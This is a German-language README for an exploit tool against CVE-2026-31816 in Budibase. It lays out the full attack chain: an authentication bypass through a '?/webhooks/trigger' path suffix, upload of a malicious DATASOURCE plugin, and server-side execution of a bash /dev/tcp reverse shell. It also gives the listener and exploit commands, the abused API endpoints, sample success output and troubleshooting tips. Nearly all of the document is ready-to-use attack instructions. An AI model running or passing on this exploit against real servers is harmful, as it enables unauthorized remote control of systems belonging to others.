
Nutzt CVE-2026-31816 in Budibase aus, um die Authentifizierung zu umgehen, ein bösartiges Datenquellen-Plugin hochzuladen und eine Reverse Shell für den Fernzugriff auszuführen.
Dieses Tool nutzt CVE-2026-31816 aus, um eine Reverse-Shell-Verbindung auf einem Ziel-Budibase-Server herzustellen.
Angriffskette: Authentifizierungsumgehung → Upload des DATASOURCE-Plugins → serverseitige Codeausführung → Reverse Shell
requests-Bibliothek (pip install requests)# 1. Listener auf dem Angreifer-Rechner starten
nc -lvnp 4444
# 2. Exploit ausführen (anderes Terminal)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444
| Parameter | Erforderlich | Beschreibung |
|---|---|---|
-t, --target | ✅ | Ziel-Budibase-URL |
--lhost | ✅ | Listener-Host (deine IP) |
--lport | ❌ | Listener-Port (Standard: 4444) |
# Angreifer-IP: 192.168.1.100
# Ziel-Budibase: 192.168.1.128:10000
# Terminal 1 - Listener starten
nc -lvnp 4444
# Terminal 2 - Exploit ausführen
python3 CVE-2026-31816-rshell.py \
-t http://192.168.1.128:10000 \
--lhost 192.168.1.100 \
--lport 4444
GET /api/integrations?/webhooks/trigger
Wenn 200 zurückgegeben wird, ist das Ziel für die Authentifizierungsumgehung anfällig.
{
"type": "datasource",
"schema": { ... }
}
Plugins vom Typ DATASOURCE führen JavaScript-Code auf dem Server aus.
// Wird ausgeführt, wenn das Plugin validiert wird:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
POST /api/plugin/upload?/webhooks/trigger
Plugin unter Umgehung der Authentifizierung hochladen. Der Code wird während der Validierung ausgeführt.
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ Angreifer │ │ Ziel- │ │ Listener │
│ │ │ Server │ │ (nc) │
│ │ │ │ │ │
│ exploit ────┼────►│ Upload │ │ │
│ │ │ Plugin │ │ │
│ │ │ Execute │────►│ Listen │
│ │ │ Code │◄────┤ Reverse │
│ │ │ │ │ Connect │
└─────────────┘ └─────────────┘ └─────────────┘
============================================================
CVE-2026-31816 - Reverse Shell Exploit
============================================================
[*] Ziel: http://192.168.1.128:10000
[*] Reverse Shell: 192.168.1.100:4444
[*] Prüfe Schwachstelle...
[+] Ziel ist anfällig!
[*] Erstelle Reverse-Shell-Plugin für 192.168.1.100:4444
[*] Lade Reverse-Shell-Plugin hoch...
[*] Status: 200
[+] Plugin erfolgreich installiert!
============================================================
[+] ERFOLG! Prüfe deinen Listener!
============================================================
Mögliche Ursachen:
Lösungen:
# Netzwerkverbindung prüfen
ping YOUR_IP
# Firewall prüfen
sudo ufw allow 4444/tcp
# Anderen Port versuchen
nc -lvnp 8080
Mögliche Ursachen:
Lösungen:
# Manuell testen, ob die Schwachstelle existiert
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# Wenn JSON zurückgegeben wird, existiert die Schwachstelle